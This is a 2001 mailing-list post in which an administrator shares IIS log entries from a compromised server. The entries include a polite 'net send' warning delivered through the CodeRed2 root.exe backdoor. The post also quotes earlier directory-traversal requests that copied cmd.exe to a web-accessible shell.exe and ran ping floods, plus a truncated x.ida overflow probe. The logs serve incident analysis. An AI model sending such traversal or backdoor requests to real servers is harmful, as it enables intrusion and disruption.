Scripted CodeRed2 reply

["Chris Curtiss" <xrayspx () xrayspx com>]

I have seen this idea floating around the focus-linux list the last couple of
days, and I have now seen this in person.  I am not at all in favor of shutting
down or crashing remote vulnerable servers.  You just really never know how
important that machine may be, there may be a very good reason the admins are
leaving it running until they can take it out of service safely.  

However, what follows is a very polite notice, and very attention grabbing.  I
just started with a new company, and it's the last thing I would have wanted to
see, but at least the guy didn't crash the machine, I would have had a far
worse day.


2001-08-13 20:19:42 24.xx.xxx.xxx - xx.xx.xx.xxx 80 GET /scripts/root.exe
/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+wor
m.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+
You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+
it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+you
r+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22
502 Lynx/2.8.4dev.7+libwww-FM/2.14

> From what I understand, this machine was not even known to be running IIS at
all.  After further investigation I found it to have been previously rooted on
6/19/01:

2001-06-19 12:22:16 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 14:47:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-prohibited%20-n++-l+65500+-w+0+ 502 -
2001-06-19 14:58:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-unknown%20-n++-l+65500+-w+0+ 502 -
2001-06-19 17:10:44 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET
/scripts/../../winnt/system32/cmd.exe
/c+ping+-v+network-unreachable%20-n++-l+65500+-w+0+ 502 -

Does the above look like a script anyone has seen previously?  I also had quite
a few of these, all from the same IP, on different days:

2001-07-31 14:36:42 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /iisstart.asp - 200 -
2001-07-31 14:36:44 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /x.ida
AAAAAAAAAAAAAAAAA-snip-

I haven't seen anything searching for x.ida before, and this was like once a
day, on about 4 different days, I thought that was odd.

This machine has been taken out of service and replaced, but that is secondary.
 Has anyone else seen the same scripted response to an infected CodeRed server?
 This popped up a dialog box essentially saying "You've been owned, fix it",
but not causing any reboots or crashes, and certainly not any measures as
extreme as I've seen tossed about recently.

Chris Curtiss
xrayspx () xrayspx com
--a unix admin in an NT world--



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com